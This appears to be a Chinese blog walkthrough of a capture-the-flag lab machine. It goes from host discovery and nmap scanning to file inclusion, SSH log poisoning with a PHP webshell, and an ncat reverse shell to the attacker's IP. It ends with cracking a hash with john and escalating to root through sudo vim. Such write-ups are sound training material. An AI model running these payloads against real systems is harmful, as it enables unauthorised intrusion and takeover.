1.确定目标靶机IP
命令:arp-scan -l 从网络接口配置生成地址
参考文章:Arp-scan 使用教程_liver100day的博客-CSDN博客_arpscan
记得将靶机设置为NAT模式(让kali和靶机能正常通信)
2.使用nmap扫描靶机开放了哪些端口
nmap参数
本次涉及参数
-Pn 无ping扫描
-sV 探测服务版本信息
-p- 扫描所有端口(或者使用-p 1-65535,如果不指定nmap默认只扫描前1000个端口)
-A 启用操作系统检测,版本检测,脚本扫描和跟踪路由
从图中可以看出开放了22(ssh)、80(http)端口。
3.打开浏览器,访问80端口,看看有什么信息,看起来是一个可怕的女人(手动狗头),打开f12或者右键查看源代码看看有什么提示可以利用。
嗯,翻译是源代码没线索,但是一个php文件存在文件包含漏洞?
发现页面当中存在一个php文件,那应该是它没跑了吧。
这些字符串都是ikilledsiriusblack,不知道siri和它有什么仇。
源代码里这段代码很明显有文件包含漏洞。
文件包含漏洞原理:
这儿也没过滤,应该随便包含吧。
4.代码里也看到这里的参数是file,nmap扫描也发现是一个乌班图的Linux系统,构造file参数包含一个敏感文件(/etc/passwd:系统用户配置文件,存储了系统中所有用户的基本信息,并且所有用户都可以对此文件执行读操作)看看能不能读取到信息试试。
成功执行!
5.接下来考虑怎么传shell,之前nmap扫描时系统还开放了22端口,是ssh服务。
注: auth.log文件会在我们尝试与Web服务器连接时为每次成功和失败的登录尝试生成日志。可以利用此功能,通过SSH以假用户身份发送恶意PHP代码,并将其作为新日志自动添加到auth.log文件中。 存放位置:/var/log/auth.log,写入一句话木马之后如果能成功执行系统命令,则证明写入成功。
之前arp-scan获得了靶机IP,尝试利用这个日志文件写入一句话木马。
命令:ssh '<?php system($_GET['cmd']); ?>' @靶机IP
检查一下一句话木马是否成功写入:view-source:http://靶机IP/ikilledsiriusblack.php?file=/var/log/auth.log&cmd=id
Linux id命令用于显示用户的ID,以及所属群组的ID。也可以用其他的linux系统命令证明写入成功。
6.写入shell之后要想办法连接它并且获取更高的权限,想要在攻击机就能够直接控制靶机需要反弹shell(靶机主动发起请求来连接攻击机)、创建交互式shell(交互式模式就是在终端上执行,shell等待你的输入,并且立即执行你提交的命令。这种模式被称作交互式是因为shell与用户进行交互。这种模式也是大多数用户非常熟悉的:登录、执行一些命令、退出。当你退出后,shell也终止了。)。
反弹shell:http://靶机IP/ikilledsiriusblack.php?file=/var/log/auth.log&cmd=ncat%20-e%20/bin/bash%20攻击机IP%201234
创建交互式shell:python3 -c "import pty;pty.spawn('/bin/bash')"
7.这个靶机的目标是获取root权限,现在还不是,需要提权。
看看文件里有什么可以利用的信息,发现一个密码字典和存放lestrange用户加密后的hash值的文件
靶机使用python开启一个临时的http服务,并且在攻击机中将那个密码字典下载下来,将那个hash值也保存并使用john工具解密(字典和hash两者在一个目录下)。
pass.dic是上面那个字典文件,改了个名字。hash.txt是存放lestrange用户的那个加密hash值。
8.使用su命令切换到lestrange用户,查看这个用户能使用什么sudo命令。
能使用vim命令,去sudo提权网站上看看怎么提权
靶机flag获取:
cat ~
ls -la
cat root.txt
1000
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
